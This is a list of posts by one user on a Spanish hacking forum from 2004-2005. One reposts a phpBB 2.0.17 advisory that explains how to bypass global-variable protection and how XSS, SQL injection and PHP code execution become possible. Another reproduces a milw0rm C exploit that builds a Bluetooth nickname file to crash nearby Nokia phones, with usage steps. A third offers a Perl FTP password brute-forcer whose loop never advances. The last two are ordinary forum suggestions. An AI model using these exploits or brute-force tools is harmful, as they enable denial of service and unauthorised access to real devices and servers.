|
Mostrar Temas
|
Páginas: [1]
|
2
|
Seguridad Informática / Nivel Web / Nuevo bug en los phpbb<=2.0.17
|
en: 2 Noviembre 2005, 15:04 pm
|
jeje pues ya va otro mas para todos los phpbbs.. To get rid of possible security problems caused by not properly initialised variables phpBB comes with the following piece of code, that is intended to deregister global variables, which were created because of the register_globals directive. Unfortunately there are atleast 3 ways to bypass the protection.
// PHP4+ path $not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS', 'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');
// Not only will array_merge give a warning if a parameter // is not an array, it will actually fail. So we check if // HTTP_SESSION_VARS has been initialised. if (!isset($HTTP_SESSION_VARS)) { $HTTP_SESSION_VARS = array(); }
// Merge all into one extremely huge array; unset // this later $input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_SESSION_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES);
unset($input['input']); unset($input['not_unset']);
while (list($var,) = @each($input)) { if (!in_array($var, $not_unset)) { unset($$var); } }
unset($input);
Bypass Vulnerabilities ----------------------
[1] In PHP5 <= 5.0.5 it is possible to register f.e. the global variable $foobar by supplying a GET/POST/COOKIE variable with the name 'foobar' but also by supplying a GPC variable called 'GLOBALS[foobar]'. If the variable is supplied in that way, the code above will not try to unset $foobar, but $GLOBALS, which completely bypasses the protection.
[2] When the session extension is not started by a call to session_start(), PHP does not know about the variables $_SESSION or $HTTP_SESSION_VARS, which means, it is possible to fill them with any value if register_globals is turned on. Combined with the fact (that was even documented in the phpBB code), that array_merge() will fail in PHP5, when at least one of the parameters is not an array, it is possible for an attacker to simply set HTTP_SESSION_VARS to a string and let the complete protection fail, because $input ends up empty.
[3] When register_long_array is turned off PHP does not know anymore about all the HTTP_* variables. This means they can be filled with anything that is completely unrelated to the existing global variables. It is obvious that the protection cannot work, when this configuration is choosen.
Additonally to the 3 possible ways to bypass the globals deregistration code, several not properly initalised variables were disclosed to the vendor, that can even lead to remote code execution.
Not properly initialised variables ----------------------------------
[1] Within usercp_register.php the variable 'error_msg' is not properly initialised and can therefore be used to inject arbitrary HTML code
[2] Within login.php the variable 'forward_page' is not properly initialised and can be used to inject arbitrary HTML code
[3] Within search.php the variable 'list_cat' is not properly initialised and can be used to inject arbitrary HTML
[4] Within usercp_register.php the variable 'signature_bbcode_uid' is not properly initialised and can be used for SQL injection of arbitrary 'field=xxx' statements into queries operating on the user table, when magic_quotes_gpc is turned off.
[5] The same variable [4] can be used to inject f.e. the 'e' modifier into the first parameter of a preg_replace() statement, which means, that the second parameter is evaluated as PHP code. Because the second parameter is entirely filled with the user supplied signature, it is possible to execute any PHP code. This can be exploited, no matter if magic_quotes_gpc is turned on or off, just 2 different code paths need to be triggered.
Proof of Concept:
The Hardened-PHP project is not going to release exploits for any of these vulnerabilities to the public. http://www.securityfocus.com/bid/15246/infohttp://www.securityfocus.com/bid/15243/infohttp://www.zone-h.org/advisories/read/id=8348saludos.
|
|
|
3
|
Comunicaciones / Hacking Mobile / Nokia Symbian 60 "Bluetooth Nickname" Remote Resta
|
en: 24 Septiembre 2005, 10:38 am
|
/* Nokia Bluetab Exploit Found & coded by Qnix - This Exploit will creat file called bluetab.txt with your bluetooth nickname, send the file to your nokia mobile open it copy the nickname and paste it to your bluetooth nickname, if any one search and find your nickname his mobile will restart . - this exploit work on many other symbian and java mobiles .
Qnix - Qnix@bsdmail.org
*/
#include <stdio.h> #define tab1 0x09 #define tab2 0x2E #define dot1 0x0A
int main(int argc,char *argv[]) {
FILE *bluetab;
if(argc < 2) { msgm(); printf("Useage : ./bluetab <nickname>\n"); return 0; } else { msgm(); printf("bluetab.txt file created with your nickname . \n"); } bluetab = fopen("bluetab.txt","w"); if(!bluetab) { msgm(); printf("Some kind of file error!\n"); return 0; }
fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); fclose(bluetab); return 0; }
msgm() {
printf(" ------------------------------- \n"); printf(" Nokia Bluetab Exploit \n"); printf(" found & coded by \n"); printf(" Qnix@bsdmail.org \n"); printf(" ------------------------------- \n\n"); }
/* v1 2005-03-04 milw0rm.com */
# milw0rm.com [2005-09-23] fuente zone-h. saludos
|
|
|
4
|
Programación / Scripting / ~Mi primer Ftp Brute Force en Perl.~
|
en: 27 Junio 2005, 14:45 pm
|
Estos dias de vacas me he puesto a programar un poco de perl, y esta mañana he terminado un brute force en perl, os dejo aqui el code #!/usr/bin/perl #este programa va probando palabras de la lista @letras hasta que encuentra la contraseña correcta. #este script esta hecho por sikik, bajo licencia bsd. use Net::FTP; $username=admin; #se podria hacer tambien en brute force, pero seria muy lento. $dead=0; while(1) { @letras=(a, b, c, aa, ab, ac, ba, bb, bc, ca, cb, cc); #si quieres usarlo tendras que poner una lista mucho mas larga. $password=@letras[$posicion]; $ftp = Net::FTP->new("www.microsoft.com", Debug => 0) or $dead=1; #hay que cambiar www.microsoft.com por el host que atacamos. $ftp->login($username, $password) or $dead=1; if($dead==0) { die("Contraseña encontrada, el password es: $password"); } };
|
|
|
9
|
Foros Generales / Sugerencias y dudas sobre el Foro / sobre el canal irc....
|
en: 26 Octubre 2004, 07:03 am
|
bueno pos que cada vez hay mas gentuza que entra al canal y empieza a insultar , a poner mayusculas etc... y cuando se les echa vuelven a entrar, asi todo el tiempo, los opers estan perdiendo el rato con esa gentuza, para solucionar eso propongo que solo tengan voz la gente con niks registrados asi si alguien hace el gilipollas se le banea el nik y listo, que decis?
sal12
|
|
|
10
|
Foros Generales / Sugerencias y dudas sobre el Foro / sobre algunos posts
|
en: 13 Julio 2004, 08:10 am
|
pos que veo que se estan cerrando muchos posts los cuales me gutaria dar mi humilde opinion y no me da timpo que ya los xapais, ademas son posts como el de la despedida de koreano( es solo un ej.) que no entiendo porque los cerrais si se cierra un post que yo sepa es porque se hace algo que no es cuento, que puede perjudicar a (el tem), o se portan mal:S y en esos post no he detectado nada de eso. solo es una sugerencia no os vayais a enfadar conmigo:'( sal12;
|
|
|
|
|
|
|